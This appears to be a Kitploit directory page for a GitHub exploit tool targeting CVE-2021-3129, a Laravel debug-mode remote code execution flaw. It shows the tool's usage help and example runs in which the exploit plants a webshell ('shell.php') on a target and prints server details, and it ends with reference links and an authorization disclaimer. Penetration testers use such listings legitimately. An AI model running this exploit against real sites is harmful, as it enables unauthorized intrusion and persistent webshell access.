Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-3129-exp — Vulnerabilidad RCE en modo Debug de Laravel (CVE-2021-3129) poc / exp | Kitploit
Herramientas/GitHubGitHub/ajisai-babu/cve-2021-3129-exp
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubajisai-babu/cve-2021-3129-exp

CVE-2021-3129-exp

Vulnerabilidad RCE en modo Debug de Laravel (CVE-2021-3129) poc / exp

Ver Repositorio
131hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad RCE en modo Debug de Laravel (CVE-2021-3129) poc / exp

CVE-2021-3129 exp / poc

  • Nota ⚠️: Debido a que la explotación y detección de esta vulnerabilidad envían múltiples solicitudes, el proceso puede ser lento.
  • uso:
root@kitploit:~
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp

Laravel Debug mode RCE(CVE-2021-3129)POC & EXP

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定目标url地址
  -e, --exp             利用漏洞写入webshell,如不指定,则仅进行漏洞检测
  -p PROXY, --proxy PROXY
                        设置代理,如socks5://127.0.0.1:7890
  • ejemplo:
root@kitploit:~
# poc
python CVE-2021-3129.py -u http://xxxxx.com 
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64

# exp
python CVE-2021-3129.py -u http://xxxxx.com --exp                     
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64 
[OK] 成功写入webshell, 访问地址 http://xxxxx.com/shell.php , 密码 whoami

# proxy
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890
  • Enlaces de referencia

    • https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g
    • https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
    • https://github.com/nth347/CVE-2021-3129_exploit
    • https://github.com/ambionics/phpggc
  • Aviso de uso

    • Esta herramienta está destinada únicamente a actividades de construcción de seguridad empresarial con autorización legítima. Al usarla para pruebas, debe asegurarse de que la acción cumpla con las leyes y regulaciones locales y de haber obtenido la autorización suficiente.
    • Si realiza cualquier acto ilegal durante el uso de esta herramienta, usted asume las consecuencias correspondientes.
Descargar herramienta